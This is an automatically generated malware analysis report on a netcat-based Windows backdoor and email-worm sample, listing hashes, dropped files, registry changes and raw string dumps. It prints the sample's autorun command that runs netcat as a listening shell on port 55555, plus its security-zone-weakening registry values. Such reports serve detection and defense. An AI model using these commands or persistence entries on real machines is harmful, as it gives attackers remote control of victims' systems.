RemoteAdmin.Win32.NetCat_1d23a57973

by malwarelabrobot on June 18th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.FAkeAlert.105 (AdAware), Backdoor.Win32.PcClient.FD, RemoteAdmin.Win32.NetCat.FD, SpyTool.Win32.Ardamax.FD, GenericEmailWorm.YR, RemoteAdminNetCat.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, RemoteAdmin, Worm, EmailWorm, SpyTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 1d23a57973153cdfb24c05c9c3c5e2f4
SHA1: 70708f86e80f2a26b522354769afb945fec8935a
SHA256: e7999726d14f963e988cc6211138ec70cf084d0ebd4e2f0b7e9aa32c94e38c20
SSDeep: 49152:1MSFFNLrUrfcnwFC4K2 vwJKcNMwAbfpH9Ou8N:ySfNLrUQnl12uYww8Oh
Size: 1906688 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Kevin Solway
Created at: 2008-04-13 21:32:45
Analyzed on: WindowsXP SP3 32-bit


Summary:

RemoteAdmin. A system tool used to allow remote access or control of computer systems.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The RemoteAdmin creates the following process(es):

nc.exe:1932
%original file name%.exe:580
virus.exe:1224
regedit.exe:972

The RemoteAdmin injects its code into the following process(es):

ALW.exe:1160
rundll32.exe:1532

File activity

The process %original file name%.exe:580 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\nc.exe (2025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\foto.jpg (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\wsetup.cmd (966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\virus.exe (33520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\INDEXH~1.TXT (122 bytes)

The process virus.exe:1224 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.01 (82 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.00 (2 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe (15021 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.02 (57 bytes)

Registry activity

The process nc.exe:1932 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2C 14 48 BA 2A 49 22 43 BB E9 C6 A9 A7 D1 F8"

The process ALW.exe:1160 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 AE 10 72 B9 94 99 59 34 40 69 8C 05 6E 3B 66"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ALW Start" = "%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe"

The process %original file name%.exe:580 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 CF 8E BC 38 29 58 01 76 B3 89 D7 E9 08 6E 36"

To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The process virus.exe:1224 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 08 85 B2 97 72 FA E1 C8 65 20 9A 2F F2 CA 5B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\ITKVAP]
"ALW.exe" = "ALW"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The RemoteAdmin modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The RemoteAdmin modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The RemoteAdmin modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process regedit.exe:972 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB BD 4D 05 69 23 3B AA 1D FB FB 29 40 F8 7E E8"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "c:\windows\system32\index1.html"

To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "c:\windows\system32\nc.exe -d -L -p 55555 -e cmd.exe"

"Virus" = "c:\windows\system32\virus.exe andrescruzvtj@hotmail.com"

The process rundll32.exe:1532 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 61 02 5C 4F 7A F7 C2 27 B2 B6 74 ED 4C FC F2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
1c902448ba8c2385602c8f5315f35204 c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.01
d92e93f974e833bb6b9cae597fcf8a49 c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.02
bb251a9f308d046931dcba40fb1e0450 c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.exe
e0fb946c00b140693e3cf5de258c22a1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\nc.exe
6fbb7d7530f7362b5495006fc5bb7909 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\virus.exe
e0fb946c00b140693e3cf5de258c22a1 c:\WINDOWS\system32\nc.exe
6fbb7d7530f7362b5495006fc5bb7909 c:\WINDOWS\system32\virus.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2900.5512
Legal Copyright: (c) Microsoft Corporation. Reservados todos los derechos.
Legal Trademarks:
Original Filename: WEXTRACT.EXE
Internal Name: Wextract
File Version: 6.00.2900.5512 (xpsp.080413-2105)
File Description: Win32 Cabinet Self-Extractor
Comments:
Language: Spanish (Spain, International Sort)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 39368 39424 4.5598 25b5d82208cedbbbc7ee430a4202819c
.data 45056 7140 1024 2.94449 99858e86526942a66950c7139f78a725
.rsrc 53248 1867776 1865216 5.5405 012b992d76feb456da9e4e33b0ff74f1

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The RemoteAdmin connects to the servers at the folowing location(s):

%original file name%.exe_580:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
COMCTL32.dll
VERSION.dll
advapi32.dll
advpack.dll
wininit.ini
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupx.dll
IXPd.TMP
TMP4351$.TMP
FINISHMSG
USRQCMD
ADMQCMD
msdownld.tmp
wextract.pdb
PSSSSSSh
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
GetWindowsDirectoryA
ExitWindowsEx
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
foto.jpg
INDEXH~1.TXT
nc.exe
virus.exe
wsetup.cmd
 . &.#&'&
UeXe
9Eu%x
8E%SH<
lO)%u
-]aRZ
}-u"=-9}
K.pf1
-K}FM
s.fJO}
.UK!R
%.oC3![*
.mKIz
.WY%]
R.lqZ
E.Pq}#
P{).ZDF
T%Fn:
2c.ncl
.CB!X
%sUvh
0@{%X
2k%uHyX9
'9h.nw
2.nKa
vs^f.et
.FBn6QN
38.GT
^*.BQ
1*/.zx>
#7.iZ2j
.lx\,
4T%_%u"H
eAswM.hL
%ZW{%x6
5#h.Gu
n9%dO
.iSqO
ssy-)p\.FG
%ueT~C
1.lD,
I.TBvZ
7.OSW
%XPkvR
j.TMfGt
B*.fYx
{,/7[(]6
7=v%sc
j8.rf
E.iHS
,.yZ2
= =%D
.Qj`H%
%s;JA
B)L9%X
^5p8uLR%X.
*^ h%U}
.sGHRN
Ap.stt
.EH /
.kb,)q
wWyC^M.tKG
%x]X*K
.vh(j
9.JZ_3
lm.Fx
kJ8H%S
ZkÊ
bkEyQ
6P%s\
=C.ve
3%uCen
(Æ@
 .%U=
.sn$j
67:%c
g.bc%
.Hv{i
T7=
%8.wDI
0K%u3
r.iCW
v.FoQ
g}3%S
9B%x!
UkX%FU!C
E%uW8x
Hg.vbL#
'x$z9!.fM>
Z9msG
%Sqz)
\Sn%D
w1O.kk
_F.uSt
G;crt
.gGwW
k.SZ9
A}%Sz
ky`%f
ht.Ic
p.GrYjD
.uhz.
ÓIo
r.Xh^
NWFE%X
,.kR~
K("M.WE
.yt7T
/s%x,
%FuPC
P)>%UL
s*Y:oójJ
C.bMK
.st2yI
7Cx%U
1_.ep
zt%umUw..
VdZ-Tw}
z.LTw
l%US#
.jiY>K
^9v%uA
@-tcP
_.oI@
1.Lf;
hw.VR
.aDOE
%s @U
.Lw52
.BGCw{
3.Xxd
S8%xK
%CYf;
.Naz(gB
.pDEaI
%b.Wr
.Bv L
2%u'?aE#
GsN*.xr
W&.BqQ
-J}VM>
\.zMq
Ã><
$;.Dk
tQP%f
?7@Ï
h;u%S
n?A%S
6&.jT9
%XW`g1
w6.Oh
UR%.c
H.gP`
1%uS9U
JUcpa=%u
 $%fk
mb%Uf
EeUw
.mGv{@
_.JD\
.aL,f
.Fq'>
YKr%Sj
7E,%X
n de espacio en: %s.
Mensaje de sistema: %s.5No se puede encontrar uno de los recursos necesarios.#
n del sistema operativo./Error en la solicitud de asignaci
n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio primero y presione Reintentar, o presione Cancelar para salir del programa de instalaci
n.XLa carpeta no es v
rese de que la carpeta existe y se puede escribir en ella.DDebe especificar una carpeta con la ruta completa o elegir Cancelar.
n de carpeta.DNo se puede cargar las funciones requeridas por el di
logo Examinar.\No se pudo cargar el archivo Shell32.dll, requerido por el cuadro de di
n del proceso <%s>. Causa: %s5El tama
ster en este sistema no es soportado.3Uno de los recursos necesarios parece estar da
ado.[Es necesario Windows 95 o Windows NT 4.0 Beta 2 o posterior para realizar esta instalaci
Error al cargar %s]Error de GetProcAddress() en funci
n "%s". Causa posible: versi
n incorrecta de advpack.dll.@Es necesario Windows 95 o Windows NT para instalar este producto No se pudo crear la carpeta "%s"
Para instalar este programa, necesita %s KB disponibles en la unidad %s. Es recomendable que libere la cantidad necesaria de espacio en disco antes de continuar.
n de la carpeta de Windows
)Apagar NT: Error en token de OpenProcess.*Apagar NT: Error en AdjustTokenPrivileges."Apagar NT: Error en ExitWindowsEx.
n del archivo. Probablemente se deba a un problema de memoria baja (poco espacio en disco para el intercambio de archivos) o un archivo .CAB da
ado.wEl programa de instalaci
n del volumen para la unidad (%s) .
Mensaje del sistema: %s.
n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio e int
ntelo de nuevo.hEl programa de instalaci
[Otra copia del paquete "%s" ya est
Desea ejecutar otra copia?$No se pudo encontrar el archivo: %s.
 No existe la carpeta "%s".
Desea crearla?lOtra copia del paquete "%s" ya est
lo es posible ejecutar una copia a la vez.OEl paquete "%s" no es compatible con la versi
n de Windows que est
ejecutando.^El paquete "%s" no es compatible con la versi
n del archivo %s que se encuentra en su sistema.
6.00.2900.5512 (xpsp.080413-2105)
WEXTRACT.EXE
Sistema operativo Microsoft
Windows
6.00.2900.5512

cmd.exe_1116:




.text
`.data
.rsrc
KERNEL32.dll
NTDLL.DLL
msvcrt.dll
USER32.dll
SetConsoleInputExeNameW
APerformUnaryOperation: '%c'
APerformArithmeticOperation: '%c'
ADVAPI32.dll
SHELL32.dll
MPR.dll
RegEnumKeyW
RegDeleteKeyW
RegCloseKey
RegOpenKeyW
RegCreateKeyExW
RegOpenKeyExW
ShellExecuteExW
CmdBatNotification
GetWindowsDirectoryW
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
_pipe
GetProcessWindowStation
cmd.pdb
foto.jpg c:\windows\system32\virus.exe andrescruzvtj@hotmail.com
oto.jpg\windows\system32\virus.exe andrescruzvtj@hotmail.com
foto.jpgus.exe andrescruzvtj@hotmail.com
foto.jpgexe andrescruzvtj@hotmail.com
foto.jpge andrescruzvtj@hotmail.com
foto.jpgndrescruzvtj@hotmail.com
foto.jpgvirus.exe andrescruzvtj@hotmail.com
foto.jpg -e cmd.exe
start /b c:\windows\system32\virus.exe andrescruzvtj@hotmail.com
foto.jpg -L -p 55555 -e cmd.exe
foto.jpg.exe -d -L -p 55555 -e cmd.exe
foto.jpgxe -d -L -p 55555 -e cmd.exe
foto.jpg
foto.jpgxe andrescruzvtj@hotmail.com
foto.jpgm
foto.jpgtart /b c:\windows\system32\virus.exe andrescruzvtj@hotmail.com
CMD Internal Error %s
)(&&())))(&))
)&((&)&))&())
)&((&)&)&()))
)(&&()))&))))
CMD.EXE
()|&=,;"
COPYCMD
\XCOPY.EXE
CMDCMDLINE
WKERNEL32.DLL
Software\Policies\Microsoft\Windows\System
0123456789
cmd.exe
DIRCMD
%d.%d.d
Ungetting: '%s'
DisableCMD
GeToken: (%x) '%s'
%s\Shell\Open\Command
%x %c
*** Unknown type: %x
Args: `%s'
Cmd: %s Type: %x
%s (%s) %s
oto.jpg
c:\windows\system32\virus.exe andrescruzvtj@hotmail.com
ws\system32\nc.reg
32\nc.reg
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\foto.jpg
tmail.com
.com"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP>
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
ows\system32\nc.reg
m32\nc.reg
c.reg
CMDEXTVERSION
KEYS
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP
c:\windows\system32\virus.exe andrescruzvtj@hotmail.com
%s %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\virus.exe
(%s) %s
%s %s%s
&()[]{}^=;!%' ,`~
d%sd%s
-%sd%sd%sd
d%sd%sd
%s=%s
X-X
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
<> -*/%()|^&=,
\CMD.EXE
Windows Command Processor
5.1.2600.5512 (xpsp.080413-2111)
Cmd.Exe
Windows
Operating System
5.1.2600.5512
Press any key to continue . . . %0
operable program or batch file.
The system cannot execute the specified program.
and press any key when ready. %0
Microsoft Windows XP [Version %1]%0
a pipe operation.
KEYS is on.
KEYS is off.
The process tried to write to a nonexistent pipe.
The switch /Y may be preset in the COPYCMD environment variable.
to prompt on overwrites unless COPY command is being executed from
Switches may be preset in the DIRCMD environment variable. Override
Quits the CMD.EXE program (command interpreter) or the current batch
CMD.EXE. If executed from outside a batch script, it
will quit CMD.EXE
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
Displays or sets a search path for executable files.
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Changes the cmd.exe command prompt.
$B | (pipe)
$V Windows XP version number
Displays, sets, or removes cmd.exe environment variables.
Displays the Windows XP version.
Tells cmd.exe whether to verify that your files are written correctly to a
Records comments (remarks) in a batch file or CONFIG.SYS.
Press any key to continue . . . %0
Directs cmd.exe to a labeled line in a batch program.
NOT Specifies that Windows XP should carry out
will execute the command after the ELSE keyword if the
I The new environment will be the original environment passed
to the cmd.exe and not the current environment.
SEPARATE Start 16-bit Windows program in separate memory space
SHARED Start 16-bit Windows program in shared memory space
If it is an internal cmd command or a batch file then
the command processor is run with the /K switch to cmd.exe.
If it is not an internal cmd command or batch file then
parameters These are the parameters passed to the command/program
under Windows XP.
Starts a new instance of the Windows XP command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
/D Disable execution of AutoRun commands from registry (see below)
/A Causes the output of internal commands to a pipe or file to be ANSI
/U Causes the output of internal commands to a pipe or file to be
variable var at execution time. The %var% syntax expands variables
of an executable file.
If /D was NOT specified on the command line, then when CMD.EXE starts, it
either or both are present, they are executed first.
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
can enable or disable extensions for all invocations of CMD.EXE on a
following REG_DWORD values in the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
can enable or disable completion for all invocations of CMD.EXE on a
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
at execution time.
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
completion for all invocations of CMD.EXE on a machine and/or user logon
the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
Shift key with the control character will move through the list
&()[]{}^=;!%' ,`~
Command Processor Extensions enabled by default. Use CMD /? for details.
ASSOC [.ext[=[fileType]]]
.ext Specifies the file extension to associate the file type with
ASSOC .pl=PerlScript
FTYPE PerlScript=perl.exe %%1 %%*
script.pl 1 2 3
set PATHEXT=.pl;%%PATHEXT%%
The restartable option to the COPY command is not supported by
this version of the operating system.
The following usage of the path operator in batch-parameter
The unicode output option to CMD.EXE is not supported by this
version of the operating system.
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the PROMPT command supports
is pretty simple and supports the following operations, in decreasing
! ~ - - unary operators
* / %% - arithmetic operators
  - - arithmetic operators
&= ^= |= <<= >>=
If you use any of the logical or modulus operators, you will need to
values. If SET /A is executed from the command line outside of a
assignment operator requires an environment variable name to the left of
the assignment operator. Numeric values are decimal numbers, unless
occurrence of the remaining portion of str1.
Finally, support for delayed environment variable expansion has been
added. This support is always disabled by default, but may be
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
of text is read, not when it is executed. The following example
So the actual FOR loop we are executing is:
%Í%% - expands to the current directory string.
%ÚTE%% - expands to current date using same format as DATE command.
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDCMDLINE%% - expands to the original command line that invoked the
If Command Extensions are enabled the SHIFT command supports
control is passed to the statement after the label specified. You must
%%4 %%5 ...)
CMD /? for details.
This works because on old versions of CMD.EXE, SETLOCAL does NOT
command execution.
non-executable files may be invoked through their file association just
by typing the name of the file as a command. (e.g. WORD.DOC would
launch the application associated with the .DOC file extension).
When executing an application that is a 32-bit GUI application, CMD.EXE
the command prompt. This new behavior does NOT occur if executing
When executing a command line whose first token is the string "CMD "
without an extension or path qualifier, then "CMD" is replaced with
the value of the COMSPEC variable. This prevents picking up CMD.EXE
When executing a command line whose first token does NOT contain an
extension, then CMD.EXE uses the value of the PATHEXT
.COM;.EXE;.BAT;.CMD
When searching for an executable, if there is no match on any extension,
If Command Extensions are enabled, and running on the Windows XP
forms of the FOR command are supported:
Walks the directory tree rooted at [drive:]path, executing the FOR
passes the first blank separated token from each line of each file.
is a quoted string which contains one or more keywords to specify
different parsing options. The keywords are:
be passed to the for body for each iteration.
where a back quoted string is executed as a
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
would parse each line in myfile.txt, ignoring lines that begin with
a semicolon, passing the 2nd and 3rd token from each line to the for
line, which is passed to a child CMD.EXE and the output is captured
IF CMDEXTVERSION number command
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
CMDEXTVERSION conditional is never true when Command Extensions are
%%CMDCMDLINE%% will expand into the original command line passed to
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
already an environment variable with the name CMDCMDLINE, in which case
%%CMDEXTVERSION%% will expand into a string representation of the
current value of CMDEXTVERSION, provided that there is not already
an environment variable with the name CMDEXTVERSION, in which case you
under Windows XP, as command line editing is always enabled.
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
CMD does not support UNC paths as current directories.
UNC paths not supported for current directory. Using
to create temporary drive letter to support UNC current
Missing operand.
Missing operator.
The COMSPEC environment variable does not point to CMD.EXE.
The FAT File System only support Last Write Times
of a batch script is reached, an implied ENDLOCAL is executed for any
application execution.
The switch /Y may be present in the COPYCMD environment variable.
to prompt on overwrites unless MOVE command is being executed from
when CMD.EXE started. This value either comes from the current console
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute

nc.exe_1932:




.text
`.rdata
@.data
.idata
.BENu
user32.dll
WaitForMultipleObjects error: %s
Failed to create ReadShell session thread, error = %s
Failed to execute shell
Failed to create shell stdin pipe, error = %s
Failed to create shell stdout pipe, error = %s
Failed to execute shell, error = %s
SessionReadShellThreadFn exitted, error = %s
%s: option `%s' requires an argument
%s: option `%c%s' doesn't allow an argument
%s: option `--%s' doesn't allow an argument
%s: invalid option -- %c
%s: illegal option -- %c
%s: option requires an argument -- %c
%s: unrecognized option `%c%s'
%s: unrecognized option `--%s'
%s: option `%s' is ambiguous
sent %d, rcvd %d
VERNOTSUPPORTED
AFNOSUPPORT
PFNOSUPPORT
SOCKTNOSUPPORT
PROTONOSUPPORT
MSGSIZE
Hmalloc %d failed
DNS fwd/rev mismatch: %s != %s
Warning: forward host lookup failed for %s: h_errno %d
%s: inverse host lookup failed: h_errno %d
Warning: inverse host lookup failed for %s: h_errno %d
%s: forward host lookup failed: h_errno %d
Can't parse %s as an IP address
Warning: port-bynum mismatch, %d != %d
loadports: bogus values %d, %d
loadports: no block?!
Can't grab %s:%d with bind
retrying local %s:%d
connect to [%s] from %s [%s] %d
invalid connection to [%s] from %s [%s] %d
] %d ...
UDP listen needs -p arg
udptest first write failed?! errno %d
Preposterous Pointers: %d, %d
sent %d, rcvd %d
%s [%s] %d (%s)
%s [%s] %d (%s) open
no port[s] to connect to
invalid port %s
can't open %s
invalid wait-time %s
invalid local port %s
invalid interval time %s
invalid hop pointer %d, must be multiple of 4 <= 28
Cmd line:
port numbers can be individual or ranges: m-n [inclusive]
UDP mode
delay interval for lines sent, ports scanned
-p port
local port number
randomize local and remote ports
inbound program to exec [dangerous!!]
nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
c:\windows\system32\nc.exe
DisconnectNamedPipe
CreatePipe
PeekNamedPipe
KERNEL32.dll
WSOCK32.dll
GetCPInfo

rundll32.exe_1532:




.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s

ALW.exe_1160:




.text
`.rdata
@.data
.rsrc
udPh
PSSSSSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
.EKSWU
FTPG
FTPj
FtPS
=KNILw.tT=RCNEw
_0 _8 _4;_,
SHA1 block transform for x86, CRYPTOGAMS by 
SHA256 block transform for x86, CRYPTOGAMS by 
DlSHA512 block transform for x86, CRYPTOGAMS by 
Montgomery Multiplication for x86, CRYPTOGAMS by 
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by 
Camellia for x86 by 
RC4 for x86, CRYPTOGAMS by 
FRegDeleteKeyExW
MARGIN-BOTTOM: 11px; BORDER-STYLE: solid; BORDER-COLOR: #DFDFE5; BORDER-WIDTH: 2px; BACKGROUND-COLOR: #DFDFE5; }H2 { COLOR: black; BACKGROUND-COLOR: #FFFFF; FONT-SIZE: 12pt; FONT-WEIGHT: normal; MARGIN-BOTTOM: 0px; MARGIN-TOP: 10px;}
mail@domain.com
Date: %d %s %d %d:%d:%d
EHLO %s
,qop=%s
,response=%s
,digest-uri="%s"
,cnonce="%s"
,nc=%s
,nonce="%s"
,realm="%s"
charset=utf-8,username="%s"
smtp/
